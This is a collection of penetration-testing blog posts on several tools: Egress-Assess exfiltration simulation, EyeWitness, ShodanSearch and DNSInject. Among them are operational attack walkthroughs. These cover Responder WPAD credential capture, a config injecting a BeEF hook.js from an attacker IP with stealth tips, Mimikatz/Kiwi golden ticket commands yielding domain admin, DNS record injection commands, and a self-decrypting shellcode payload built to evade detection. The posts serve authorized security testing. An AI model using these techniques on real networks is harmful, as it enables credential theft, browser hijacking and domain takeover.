Egress-Assess – Testing your Egress Data Detection Capabilities

Github Link: https://github.com/ChrisTruncer/Egress-Assess

On a variety of occasions, our team will attempt to extract data from the network we are operating in and move it to another location for offline analysis.  Ideally, the customer that is being assessed will detect the data being extracted from their network and take preventive measures to stop further data loss.

When looking to copy data off of our target network, an attacker can do so over a variety of channels:

  • Download data through Cobalt Strike’s Beacon (over http or dns)
  • Download data through a Meterpreter Session
  • Manually moving data over FTP, SFTP, etc.

While we routinely inspect and analyze data from the customer environment in order to aid in lateral movement, we also provide customers data exfiltration testing as a service. Performing a data exfiltration exercise can be a valuable service to a customer who wants to validate if their egress detection capabilities can identify potentially sensitive data leaving their network.

I wanted to come up with an easy to use solution that would simulate the extraction of sensitive data from my machine to another.  While trying to plan out a tool, I targeted a few protocols commonly used by attackers:  FTP, HTTP, and HTTPS.  To ensure that I could generate “sensitive” data that would be discovered during defensive operations, I needed to identify what multiple organizations would highly value. Two different sensitive data types that would likely have signatures across organizations are social security numbers and credit card numbers and I decided to target those forms of data in my proof of concept.

After spending a couple days piecing bits of code together, I am happy to release Egress-Assess.

Updated EgressAssess Help Menu

Egress-Assess can act as both the client and the server for the protocol you wish to simulate.  It supports exfiltration testing over HTTP, HTTPS, and FTP.  I envision the tool being used on an internal client and an external server where data would be passed over network boundaries. Once cloned from the repository, the dummy data can be transferred from one machine to another. 

To extract data over FTP, you would first start Egress-Assess’s FTP server by placing it in server mode with the ftp and providing a username and password to use:

./Egress-Assess.py --server ftp --username testuser --password pass123

FTP Server Setup EA

Running that command should start something similar to the following:

FTP Server

This shows that the FTP server is up and running.  With this going, all we need to do now is configure the client to connect to the server!  This is simple, can can be done by telling Egress-Assess to act in client mode and use ftp, provide the username and password to use, the ip to connect to, and the datatype to transmit (in this case, social security numbers).  Your output should look similar to the following…

./Egress-Assess.py --client ftp --username test --password pass --datatype ssn --ip 192.168.63.149

ftpclientupdated

Within the same directory as Egress-Assess, a “data” directory will be created.  Within it is where all transmitted files will be stored.  At this point, the transfer is complete via FTP!

You can also do the same over HTTP or HTTPS.  Again, the first step will be starting one instance to act as the server in http mode.

./Egress-Assess.py --server http

HTTP Server Startup

This will now start a web server to listen on port 80.  The next step is to have your client generate new dummy data, and send it to the web server.  Only this time, we’ll change it up by specifying the approximate amount of data we want to generate.

By default, Egress-Assess will generate approximately 1 megabyte of data (either social security numbers or credit card numbers).  This amount can be changed using the “–data-size” flag.  If we want to send approximately 15 megabytes of credit card data to our web server over http, the command may look as follows…

./Egress-Assess.py --client http --data-size 15 --ip 192.168.63.149 --datatype cc

HTTP Client setup

http data sent

As you can see above, the file was transferred, and our web server received the file!

That about rounds out the current state of Egress-Assess.  Future revisions will include making a more modularized tool so users can easily add support for new protocols, and new data types for transfer.  If there are any other requests, I’d love to hear them!

Getting Hooked up with Responder and Beef

Responder is a really effective tool that I’ve written about before which can be used to easily obtain user credentials on a network.  However, in Responder’s 2.0 release, the ability to perform HTML injection attacks were added to the tool.  This capability can be easily utilized to perform a variety of nefarious actions against our targets.  The first tool that I thought using to leverage the HTML injection capabilities of Responder, is Beef.  Beef is described as being a browser exploitation framework.  The goal of an attacker utilizing Beef would be to “hook” another user’s browser.  Once hooked, Beef contains a large number of modules that can be used to attack the victim’s web browser (which I would perform a disservice if I tried to describe all of Beef’s capabilities in a single post).  So the attack that I’m going to demonstrate is using Responder’s ability to inject HTML and hook systems on the network I am targeting with Beef.

Edit: @Antisnatchor provided some really good feedback in the comments.  I think it’s worth everyone reading what he said, so they are copied here:

“Few things to add, change the following in the main config.yaml config file:

– reduce xhr_poll_timeout to 500 (milliseconds), so polling will happen twice a second
– change hook_file to jquery.js or something different to change the hook name (more stealthy), as well as hook_session_name and session_cookie_name to different values.
– enable the Evasion extension, just use ‘scramble’ + ‘minify’ as obfuscation techniques. This will minify/pack JS and scramble variables like BeEF/beef to random ones.
– change default BeEF credentials and web_ui_basepath

I would also add the BeEF hook tag in rather than .

Then once it’s up, you can automate module lanching to multiple hooked browser based on fingerprinting results via the RESTful API.” 

First, you’re going to need to get Beef started on your attacking platform.  If you’re using Kali, it’s located within the /usr/share/beef-xss directory.  Once within it, simple type “./beef” and wait as the framework starts up.  Your console should look similar to the following once it is ready to go:

Beef startup

Next up, we need to slightly modify Responder’s config file.  If you haven’t already, clone the project to your attacking platform, and then open up Responder.conf in a text editor.  Within the Responder.conf file you’re going to want to change the “HTMLToServe” value.  To carry out the attack, we want to inject Beef’s javascript file used to hook browsers.  I just changed the value to be:

HTMLToServe = <html><head></head><body><script src="http://192.168.63.149:3000/hook.js" type="text/javascript"></script></body></html>

Your config should look similar to the following now:

Responder Config

With this added in, Responder will inject the javascript containing our beef hook into any page that it is able to do so.  First, I’m going to need to start Responder.  The options that I am passing into Responder tells it to listen on my local IP, stand up a rogue wpad proxy, and display verbose messages.

Start Responder

With both Beef and Responder up and running, it’s time to get our hooks!  To test this out, I’m going to just have the web browser from my Windows 7 victim VM attempt to navigate to http://intranet/.  When it requests the web page, Responder will serve up the a web page.  In my case, I don’t have an actual machine called “intranet” within my lab network, so Responder will just serve up a web page only containing the Beef hook code.

Web-Requested

Not only did Responder see the web request, but it was also able to obtain the NTLMv2 hash use by the current user “sonofflynn”.  If I were to look at the web page on my Windows 7 VM, it just shows a blank page.  However, the blank page has also loaded up my beef hook, and after logging into the Beef console, I can see it’s successfully been hooked.  With our victim’s browser hooked, we can now perform a wide variety of enumeration and attacks against or through the victim’s browser.  I highly recommend to review the large number of posts that talk about beef and the variety of attacks it contains.

Beef Hooked

I have had at times Responder act “funny” by serving up what appears to be random ascii code vs an actual website.  I have also had issues with it injecting the HTML code at times.  However, this seems to work best for me to get repeatable results and hooks.  If there’s something that I’ve missed, or a better way to inject html code/beef hooks/etc. I’d love to hear about it and get to learn a better way (or maybe the right way :)).  Otherwise, hope that this helps, and feel free to hit me up for any questions!

Responder & User Account Credentials – First Come, First Served

Responder is an awesome tool that was created by Laurent Gaffie and can be extremely effective to use on pen tests.  I recently had the opportunity to use Responder, and it returned valid domain credentials within about 10 minutes.  I wanted to write this post as an opportunity to document what worked for myself.  With that said, Larry Spohn also wrote an excellent blog post on essentially the same attack which can be viewed here, so be sure to go and check that post out as well!

Responder can return results two different ways.  We can try to receive the NTLM Challenge hash(es) from workstations, or Responder can return credentials via basic authentication.  Ideally, the easiest for an attacker to work with will be basic auth based authentication due to the data being easily reversible since it is base64 encoded.

The specific vulnerability that is being attacked in this situation is that workstations will be configured to automatically detect proxy settings for the network they are operating on by default.  When a workstation attempts to find the proxy settings needed, it does so by requesting for “WPAD” initially over DHCP.   If the workstation doesn’t receive a response, it will then make multiple DNS requests.  If DNS also doesn’t return any results, the workstation will finally fall back to requesting over NetBIOS (source). If configured to do so, Responder will can act as a rogue wpad proxy.  Responder can then serve a PAC file (configured as you see fit) and attempt to proxy all connections through itself.

One trick Responder can do (if configured to do so) is to respond to http requests from workstations that are attempting to access local resources (such as http://intranetsite).  The nifty aspect to this trick is to the user, the pop-up will appear as a normal looking authentication box that is prompting the user to enter their credentials.  Once entered, the credentials are transferred to the attacker, base64 decoded, and displayed to the attacker.  So, that’s the background to this attack, how about lets check it out?

First, we’re going to need to configure how Responder is going to operate on the network.  We’re going to need to pass it a couple command line options:

  • -i <IP Address or network interface> – The IP address to listen on
  • –wpad – Tells Responder to start a “rogue” wpad proxy server
  • -b – Tells Responder to return Basic Authentication information vs. NTLM
  • -F – Tells Responder to force NTLM or Basic authentication from any machine attempting to access the wpad file
  • -f – Tells Responder to fingerprint the host

Starting Responder

As you can see, Responder is pretty simple to setup and get up and running.  Once the previous command has been run, you should see something similar to the following:

Responder Started

This is roughly what Responder is going to look like once it is up and running.  For now, you can sit and wait for information to start coming in.  A good time to utilize Responder is when you’re first getting started on an assessment.  Responder can be one of the first tools you get running, and you can just leave it be and check back in on the results later.

Once Responder has been running for a while, check out if there’s been any juicy information returned to us!  Below is a what your output will likely look similar to:

Responder Output

What’s awesome to see here, is the “HTTP-User & Password:” line!  We can see the username “testuser” and password “badpassword” were returned to us, so now we have the first set of user credentials!  From a user’s perspective, this is what the popup looked like on a Win 8.1 desktop:

WPAD Desktop

This is a fairly typical screen and users are *LIKELY* going to enter their account information without a second thought.

At any point, you can stop running Responder, and it will have logged all credential information into a file for viewing.  In my case, this is what I have on my attacker platform:

Responder Loot File

If the same user were to keep entering their username and password, there would be duplicate (or more) entries of the credentials within the loot file.

Responder is an extremely powerful tool that can be used to quickly grab credentials when plugged into a network segment that users are also operating on.  I highly recommend using it as it can be a great way to get an initial foothold into your target network.

Mimikatz, Kiwi, and Golden Ticket Generation

First off, I want to state that the purpose of writing this post is to help myself learn how to use Golden Tickets on assessments.  If you want to see some great write-ups about Golden ticket generation, be sure to look at these:

Those posts are significantly more authoritative on the subject than mine, I just wanted to write this out so I can reference this on assessments.

Golden tickets can offer an extremely powerful to escalate privileges for an attacker on a network, or obtain access to resources which are only available to a select group.  However, it’s absolutely worth mentioning that with this great power, pen testers need to take extra precaution to protect any golden tickets that they’ve created.  It’s highly recommended that any tickets created should be securely encrypted during your assessment, and securely deleted when it is no longer needed.

Golden Tickets can be generated two different ways.  The first way is through the kiwi extension in Metasploit, and the other is through Mimikatz’s stand alone application.  This post will show how to use both options to generate your ticket.  Lets start off with Metasploit’s Kiwi Extension.

At this point, I am going to assume that you have a meterpreter session, as SYSTEM, on the domain controller for the domain you are targeting.  Within your session, you want to load the kiwi extension by typing:

load kiwi

Load Kiwi

Now that the kiwi extension is loaded, when you type help, you should see the additional commands that are available for you.  The command that we’re interested in is golden_ticket_create.  In order to create the golden ticket, we’re going to need at least four pieces of information (tickets can be further customized with additional information, but the generation process needs a minimum of four):

  • The Domain Name
  • The Domain SID
  • The krbtgt account’s nt hash
  • The user account you want to create the ticket for

MSF Golden Ticket Create

To get this information, you can just interact with the meterpreter session you already have active.  Drop into a shell, and run:

whoami /user

Domain Sid

The domain SID starts at the S-1… and goes to …70370.  Copy and paste that information into a text file.  Next up, grab the domain name.  One way I like to do this is just running:

ipconfig /all

Find Domain Name

In this case, I can see (and I know) the domain name is PwnNOwn.com.  So, this info should also be saved off to a text file.  The last big hurdle that you will need is the nt hash from the krbtgt account.  Since you should be on the DC, perform a hashdump and obtain the krbtgt hash.

Now that we have all of the required information, we can generate a golden ticket!  At this time, go ahead and determine the user account you are wanting to impersonate, or, you can actually use an account that is nonexistent.  Now, it’s just getting everything in place for the command.  In our case, the command looks like this:

golden_ticket_create -d PwnNOwn.com -k <nthash partially redacted> -s S-1-5-21-522332750-710551914-1837870370 -u invaliduser -t /root/Downloads/invaliduser.tck

MSF Ticket Created

We can see from the previous picture that the ticket was successfully created and written out.  The user that we are impersonating is “invaliduser”, and the ticket is saved to /root/Downloads/invaliduser.tck.

Now that the ticket has been created, it’s time to apply it to our current session.  To do this you want to type the following command:

kerberos_ticket_use /root/Downloads/invaliduser.tck

Ticket applied

In the above screenshot, I cleared all existing tickets, then applied the created ticket, and then we can see the golden ticket in use.  Note: you don’t have to purge existing tickets, but I did for demonstration purposes.

Now that the ticket has been applied, a low level user account can now act as a Domain Administrator:

MSF Ticket Applied

The user account could not previously access the DC’s C$ share, but with the ticket applied, it can!  We’re now operating with the same level of permissions as a DA!

 

So, our other option for generating and using golden tickets is to use the mimikatz binary.  You can download that from here.  Once downloaded, navigate to the mimikatz binary and start it.  We can re-use the information that we already have to generate our golden ticket.  To generate the ticket, you’re going to run a command similar to the following:

kerberos::golden /user:invaliduser2 /domain:PwnNOwn.com /sid:S-1-5-21-522332750-710551914-1837870370 /krbtgt:<ticket partially redacted> /ticket:invalidadmin.tck /groups:501,502,513,512,520,518,519

(Thanks to Benjamin Delpy (@gentilkiwi) for letting me know that I failed at redacting my own krbtgt hash, haha.  This is why you should always post things from a test/lab domain :).  Pic below is now updated)

TicketcreatedWin

 

In this case, we’re creating a ticket for a non existent user account, the User ID is at its default value (500), and we’ve added groups that the user should be part of.  The ticket is saved to the invalidadmin.tck file within the same directory that the mimikatz binary is running from.

Now that the ticket has been created, we just want to apply it with Mimikatz.  This can be done by running the following command:

kerberos::ptt invalidadmin.tck

Win Ticket Submission

And to verify that we have administrative access to the domain controller again…

Access DC Share

We can actually also see from the DC that the Logon was successful, even though it was with an account that doesn’t exist within the domain!

Windows Log

And that’s about it!  Writing this out helped me gain a better understanding about generating and using golden tickets, hope that it can help someone else too!

EyeWitness Now in Ruby!

The best way that I learn languages, is to give myself a task, and force myself to write a script/program that carries out that task.  Well, in this case, I’ve been wanting to change some aspects of EyeWitness, and decided that porting EyeWitness to Ruby would be a great way to make those changes, and learn a new language.  After @harmjoy suggested that I look into learning Ruby, I decided to dive in and get it done.  Now, about two months of working on it, I’m happy to say the EyeWitness Ruby port is ready for its initial release.

To view and download EyeWitness, head to my Github account, or click here!

I will continue to keep the Python version of EyeWitness available, as there are a few differences between the two versions of EyeWitness.  These differences are:

  • Screenshot Library – By adding an additional library for capturing screenshots, the user can switch between the two in the event that one library encounters an issue when capturing select websites.
    • The Python version of EyeWitness uses Ghost to take screenshots of websites.  One of the benefits of this is that it can run headlessly.  However, I have seen an issue when given 3000+ websites, Ghost can freeze.  Also, Robin Wood (@digininja) pointed out that EyeWitness can completely crash while screenshotting websites.  This looks to be due to a potential file descriptor leak within Ghost.  Even though I rarely hit these issues, I still wanted a solution/alternative.  An alternative has been implemented in the Ruby version.
    • The Ruby version uses Selenium for capturing screenshots.  Specifically, Selenium-Webdriver will start up an instance of your web browser (default firefox),  and use the web browser to navigate and screenshot web pages.  For this first release, the ruby version is ONLY supporting Firefox (or a fork like Ice Weasel).  Future releases will support other browsers, such as Chrome.
  • User Agent Switching
    • The Ruby version of EyeWitness does not currently have the ability to dynamically switch user agents for every URL and perform the same comparison checks that the Python version can carry out.  This is because EyeWitness would have to instantiate a new selenium-webdriver object for every user agent, and that takes place in the form of a new web browser opening up.  I believe it would be more of a hassle/distraction to have a large number of web browsers open, so I have not implemented it in the Ruby version.  However, if this is needed, you can still use the user agent switching functionality within the Python version.
  • File Input
    • The Ruby version of Eyewitness requires you to specify the file type you are using as input.  If using Nmap XML output for EyeWitness, you will have to use the –nmap flag, for nessus, the –nessus flag.
  • Skip Sorting
    • The Ruby version has a –skip-sort flag.  This will tell EyeWitness not to group similar pages together, and just write out the report as it goes, vs. writing the report at the end after sorting all pages.

These seem to be the major differences within the two versions for the time being.  I personally believe the Ruby implementation of EyeWitness will be better to use for assessments.  If you encounter any issues, please be sure to report them to me!

Thanks!

EyeWitness Usage Guide

NOTE: This post is now out of date – check this for the latest info – https://www.christophertruncer.com/eyewitness-2-0-release-and-user-guide/

I originally released EyeWitness in February in what I thought was pretty functional state.  When released, EyeWitness came in at about 400 lines of code.  Since February, it has had multiple new features added to it (which I will go over in this post), and its code base has expanded to about 1600 lines of code. I’d like this post to act as a usage guide of all normal usage scenarios that I can think of.

I’ll start off by describing how I normally use EyeWitness.  I typically call EyeWitness, provide it a text file (with each URL on a new line), and let it run.  If I have a .nessus file or nmap.xml output, and it has more than 350 URLs, I’ll run EyeWitness with the –createtargets flag (explained below), and output all the targets to a single text file.  I typically then split that file up into roughly 300 URLs per text file, and then either script up EyeWitness to run one after another, or run scans simultaneously.  However, different situations might cause EyeWitness to need to be used in a different manner, so hopefully this EyeWitness usage guide can help explain all of its features.

Python:

The bare bones, and likely most common, use of EyeWitness is to provide a single URL, or multiple URLs within a file for EyeWitness to screenshot and generate a report.  To provide a single URL, just use the –single flag as follows:
Single URL Scan

EyeWitness also accepts files for providing the URLs.  The file can be provided in the following formats:

  • Single text file with a URL on each line
  • Nmap XML output
  • .Nessus file
  • amap file output
To perform a scan, using any of these filetypes, just provide the -f flag as follows:
File Input Scan

By default, EyeWitness will attempt to screenshot the website, and have a max timeout of 7 seconds.  If it takes longer than 7 seconds to render the website, EyeWitness will skip to the next URL.  If you wish to change the timeout of EyeWitness, use the -t flag and set it to the max number of seconds you want it to wait to render a website. Set Timeout

Once EyeWitness has finished navigating to all URLs, and has generated a report, EyeWitness outputs the report to the same directory EyeWitness is in, and names it based off of the date and time the scan ran.  If you want to change the directory name that EyeWitness outputs its report to, use the -d flag and provide the name.  When using the -d flag, you can provide just a name, and EyeWitness will create the report using the provided name within the same directory as EyeWitness.  You can also provide the full path to a directory, and EyeWitness will create the report folder at that location (just make sure you have the proper write permissions).

Directory name change Full Path report

Sorted reporting was a feature brought up to me by Jason Frank (@jasonjfrank) as something that would be helpful when reviewing the EyeWitness report.  If we had a way to make EyeWitness analyze the different web applications, and group similar web apps together, then it would be easy to quickly sort through/review the groups you want to target.  We envisioned similar printers, mirrored web pages, etc. all grouped together within the report.  Lucky for us, Rohan Vazarkar (@cptjesus) worked on adding this feature in.  His pull request was merged in on April 22nd, and EyeWitness will now attempt to sort all results based off of their title within each report generated.

The –localscan option was added based on a request from David McGuire (@davidpmcguire).  We wanted a way to perform some basic port scanning for web servers once a machine has been compromised. Currently, one way to do it is to drop Nmap on the compromised machine, but if we did that, we’d have to install winpcap on the machine, which requires admin rights.  Instead of this, you can drop the windows Eyewitness binary, and provide the –localscan option with a CIDR range to scan.  EyeWitness will then try to find any ip listening on 80, 443, 8080, and 8443 within the provided range.  All live hosts listening on any of those ports will be added to a file that can be fed back into EyeWitness.

Localscan Portscanning

The –createtargets option came about when I wanted to have EyeWitness just provide me a list of all web servers from the XML output of Nmap or Nessus.  All web servers that EyeWitness finds within Nmap’s xml output, or the nessus file will be added to a file containing the target servers.  Just provide the filename you want the your targets file to be called.

createtargets

The user agent definition and cycling came about from working with Micah Hoffman (@webbreacher), Robin Wood (@digininja), and Chris John Riley (@ChrisJohnRiley).  After a lot of discussion on how best to carry out user agent switching and comparison, the feature was added in.  First, you can simply provide the –useragent option, and it will use any string you provide as the user agent.

Single User Agent

You can also use the –cycle option along with either browser, mobile, crawler, scanner, misc, or all.  When using this option, EyeWitness makes a baseline request.  It will then make subsequent requests with user agents of the “type” you specified.  If the subsequent requests deviate “too much” from the baseline request, the subsequent request will be added in to the report letting you know it was different from the baseline.  The deviation is currently based on the length of the source code the web server provides to EyeWitness.  By default, the deviation that’s used to measure if the requests are different is set to 50.  To change this value, use the –difference flag and provide the new value to use.

Uacycle Cycling Set Difference Value

Finally, the –jitter option was one that was discussed about at a NovaHackers meeting, and also requested by @ruddawg26.  To use this option, provide all the scan parameters you would normally provide, but add on the –jitter parameter at the end, and provide the base number of seconds that it deviates from.  Now, EyeWitness will randomize the order of the URLs provided (via text or XML), and will also have a random delay between each request.

Jitter command Jitter scan

Finally, EyeWitness has a –open flag.  If you provide the –open flag, each URL passed into EyeWitness will also be opened up in a web browser.  Your command string might look similar to the following:

Open option

Ruby:

EyeWitnessRubyHelp

To generate a report for a single website, you need to use the -s or –single flag and provide the URL.

For file based input, you will need to specify the filetype that you are providing.  If giving just a normal text file with each URL on a new line, use the -f or –filename switch.  If using providing Nmap XML output, you’ll need to use the –nmap flag, and .nessus based input requires the –nessus flag.

The –skip-sort flag is used to tell EyeWitness to not auto-group similar web pages together in the report.  This can be helpful if you want to see report pages as they are available, instead of waiting until the very end.  However, if this flag is used, similar pages will not be grouped together.

The –no-dns flag is used when you want EyeWitness to find web servers via their IP address, not their DNS name, while parsing Nmap XML output.

This pretty much covers the features of EyeWitness.  If anyone has any questions, don’t hesitate to get in touch with me.  Also, please be sure to send any signatures you might have made!

ShodanSearch.py for Command Line Searches

By now, everyone should know what Shodan is, and how to use it.  It’s been out for a couple of years, has had multiple presentations on it, and its capabilities have been added to at least a few tools out there (I believe) when used for reconnaissance.  Shodan indexes a large amount of data, which is really helpful when searching for specific devices which happen to be connected to the internet.

In my case, I wanted to start adding signatures of different devices to EyeWitness, but I needed something that could quickly find the devices I wanted to write a signature for.  Quite obviously, Shodan was my answer.  Something else that I wanted to do, was to stage multiple searches for different devices on Shodan.  However, if I were to do this via the web interface, I would either have to perform a search, and then perform the new search, or manage a large number of tabs.  I figured it would be easier to write a quick script that utilizes Shodan’s API (grab an API key here), as it would give me flexibility to script up a large number of search for review later on.  This spawned in a quick script to search Shodan, fittingly called, ShodanSearch.

ShodanSearch

The simplest way to use this script is to call it with the -search option, and provide a string to search for.  This is just like searching for a string on the website.  So you could perform that search by typing something similar to the following:

./ShodanSearch.py -search Apache

And see something similar to this:

String Search

Another feature that can be useful, is to search Shodan by IP.  This will return everything Shodan has indexed about the services available on the provided IP.  There’s three different ways to do this within ShodanSearch, you can either use the -ip, -cidr, or -f options.  The -ip option will perform a Shodan search for a single IP address, the -cidr option will perform a search on Shodan for every ip within the provided CIDR network range, and the -f option will take a file that contains IPs, and search for all results on those IP addresses.  Your searches could look similar to the following:

IP Search

These last few search options have been helpful when my team is on assessments, and we just want to script up a way to see what’s been publicly indexed about our targets.  Most of the time, it’s purely informational documents, but it’s something that has been valuable to our customers, so we provide it to them.

The only thing you’ll need to do to get up and running, is to add your Shodan API key in the script.  After that, you should be good to go!  Hope this helps, feel free to get in touch with me for any questions you may have.

DNS Modification with DNSInject for Nessus Plugin 35372

Part of our normal pen test process, when performing an external assessment, is running a Nessus scan against the in-scope IP range(s) provided by our customer.  We usually have this running in the background while carrying out our own analysis against the IP ranges.  On a past assessment, we started with this same process.  After some time went by, I checked our scan results that we had so far, and found an interesting vulnerability listed.  Specifically, Nessus plugin 35372:

Nessus Plugin Info

Looking at the finding details, Nessus also provided the DNS zone that is vulnerable to modification.  However, one thing that I didn’t see was an existing tool that allowed me to perform the record injection attack (see note below).  I have only seen a finding similar to this on an internal assessment, and in that case I used dnsfun.  However, I wasn’t sure dnsfun would work in this case, and I wanted to learn how to write a script that would perform this attack myself, so I decided to do just that.

I started off by checking out RFC 2136, and learned that I’m going to need to specify the zone that I want to modify (add/remove) a record for and the resource record itself that will be modified, while being sure to set the DNS packet’s opcode to 5 (Update).  This is something that could be easily done with scapy.

Scapy Packet Definition

The great thing about scapy, is you can define any specific packet attribute values that you wish (ttl, record type, etc.), and the attributes that aren’t specified are automatically populated by scapy with their proper values.  The above code states that I want to send a packet to a specific destination, it’s a DNS UDP packet, with the opcode set to 5 (update), and the DNS specific information is set by the command line options provided by the user.  And… that’s it!

I wrapped this up into a script that lets you either add or delete A records on a vulnerable name server pretty easily.  It’s called, simply, DNSInject.

DNSInject Options

To add a record with DNSInject.py, just specify the add action, provide the vulnerable name server, the A record you wish to create, and the IP it will point to.  Your command should look similar to the following:

./DNSInject.py --add -ns 192.168.23.1 -d thisisa.test.local -ip 192.168.23.5

Injection

To delete a record, you only need to provide the vulnerable name server, and the record to delete.  Again, your command could look similar to the following:

./DNSInject.py --delete -ns 192.168.23.1 -d thisisa.test.local

Deletion

To get and use DNSInject, just clone the following github repo – https://github.com/ChrisTruncer/PenTestScripts

Hope this helps, and if you have any questions, feel free to ask!

 

Note: Of course, after completing writing this script, I discovered two other options which can help carry out this attack, so I wanted to be sure to mention them.  Scapy has a built in function to both add and delete records, and you could also use nsupdate. Definitely be sure to check out those options as well!

EyeWitness – A Rapid Web Application Triage Tool

More than half of the assessments that myself, and our team, go on include web applications.  Even on network level assessments, as we identify live machines within a target network, it’s fairly common for us to find a large number of web applications.  These web apps can be their own application for the customer’s purpose, or web front ends for various appliances (switches, VOIP phones, etc.).  I needed a way to be able to quickly get a quick look of all the devices serving up a web page, which would allow me to try to figure out the websites to prioritize.  Tim Tomes developed an awesome tool called PeepingTom which does what I needed.  It works great, and I recommend everyone check it out.

However, PeepingTom requires PhantomJS, and needs to be downloaded separately.  I’ve had a couple issues where it fails to grab a screenshot of the web application, and it intrigued me.  I started researching different ways to take screenshots with a python script, and stumbled upon Ghost.py.  Ghost is a self described “webkit based scriptable web browser for python”, and is able to very easily screenshot web pages.  At this point, I thought it would be a fun task to try to create my own tool which captures screenshots and generates a report as a thought exercise, and the end result is EyeWitness.

EyeWitnessUI

EyeWitness is designed to take a file, parse out the URLs, take a screenshot of the web pages, and generate a report of the screenshot along with some server header information.  EyeWitness is able to parse three different types of files, a general text file with each url on a new line, the xml output from a NMap scan, or a .nessus file.  Jason Hill (@jasonhillva) worked on creating the XML parsing code for EyeWitness, and provided a lot of feedback throughout writing it.  We also compared the results of both the XML and nessus parser to Tim Tomes’s in PeepingTom, and they are near identical, so we’re happy with the parsing capabilities.

In addition to providing the file name, you can also optionally provide a maximum timeout value.  The timeout value is the maximum amount of time EyeWitness waits for a web page to render, before moving on to the next URL in the list.

EyeWitnessCLI

EyeWitness will generate a report based on the screenshots it was able to grab, and will provide the header information alongside it.  The report is extremely similar to PeepingTom’s output because I honestly thought it contained a lot of useful information.

EyeWitnessReport

There is a couple things EyeWitness does to differentiate itself.  EyeWitness is able to identify web application default credentials for the web page that it is looking at.  When EyeWitness recognizes a web application, it will provide the default credentials along with the server header info.  Currently, EyeWitness has a small number of devices/webpages it can recognize in its signature file, however, that’s simply because I don’t have direct access to other machines at the moment.

Also, screenshots captured by EyeWitness are near full-size of the web application itself, and contains the entire page of the URL specified.  You’re able to easily look at the full screenshot by moving the slider around within the table, or simply click on the picture and access it in its own tab.

Another option EyeWitness provides is the ability to open all URLs within a web browser (on Kali) automatically, as it goes through the list of URLs.  So, as the tool runs, an iceweasel web browser will open tabs of all the URLs you provided within the input file.

I’d like to introduce a call to action.  As you find web pages that use default credentials for a web app, or networked devices, I’d love if you could send me the source code of the index page, along with the default credentials, to EyeWitness [at] christophertruncer [dot] com, or simply send a pull request to me with the signature you created in the signature file.  As I encounter applications with default credentials, or I am sent them, I will update EyeWitness to be able to identify and provide those default creds.

To add signatures to the signatures.txt file, simply add the “signature” which is used to uniquely identify the web app/device on a new line, use the “|” (pipe) as the delimiter, and then add the default credentials on the same line.

Thanks again for checking EyeWitness out, and hope that it can help you out on assessments!

EyeWitness can be cloned from – https://github.com/ChrisTruncer/EyeWitness

A slide deck I made for a NOVAHackers presentation is available here.

Developing a Self-Brute Forcing Payload for Veil

I’ve always thought the concepts that Hyperion utilizes to encrypt and hide an executable are very interesting.  As a result, I thought it would be a fun exercise to try to create a Veil payload that utilizes the following concepts:

  • Encrypt the shellcode stored within the executable
  • Only contain part of the decryption key within the executable
  • Make the payload brute force itself to find the complete decryption key

Hopefully, it’ll be worthwhile to walk you through how this payload works, so that’s what I’ll do. 🙂

Encrypting and decrypting shellcode is the easy part, this is something that is already done in Veil’s AES, DES, and ARC4 encrypting payloads.  But I needed to create a script that attempts to decrypt our ciphertext, thousands of times until it finds the decryption key.  I incorrectly assumed that when using the incorrect decryption key, and exception would be thrown, but that isn’t the case.  The decryption routine is still run on our ciphertext, and garbage data is returned as out “cleartext” data.  Since I can’t trigger an event based on an exception of the wrong decryption key being used, I needed a different method to determine when the real key has been found.  My implementation is to encrypt a known string with the same key used to encrypt the shellcode.  

Each round of the decryption routine will decrypt the ciphertext containing our known cleartext string.  The decrypted value is then compared to the known plaintext string.  If they don’t match, then the code assumes the wrong decryption key was used, and changes to another key.  If the decrypted string matches our known string, the code then assumes that the real key has been found.

BruteForcing Payload

The picture above is the obfuscated source code to the brute-forcing payload.  Line 5 contains our partial decryption key, but not all of it.  They key was artificially constrained to ensure the final few ascii characters used as the decryption key are numerical.  The numbers chosen are within a known range, so while we don’t know the exact number used, we can simply try all numbers within the known keyspace until the correct decryption key is identified.

Line 8 creates a for loop which will loop through all numbers within the known keyspace, and line 9 creates a decryption key by concatenating our partial key plus the “current number” of our for loop.  Line 11 is our attempt to decrypt our known string, and line 12 is checking the decrypted value against our known string.  If it’s a match, we can assume that this is our decryption key.

Once the key has been found, the script then drops into the if statement, and acts like any of Veil’s other encrypted payloads; system memory is allocated for use, the shellcode is decrypted, placed into memory, and then the decrypted shellcode is executed in memory.

The timeframe it takes it receive the callback from this payload obviously varies based on the “random” number that was generated and used in the decryption key.  This payload will be released shortly as one of Veil’s upcoming V-Days.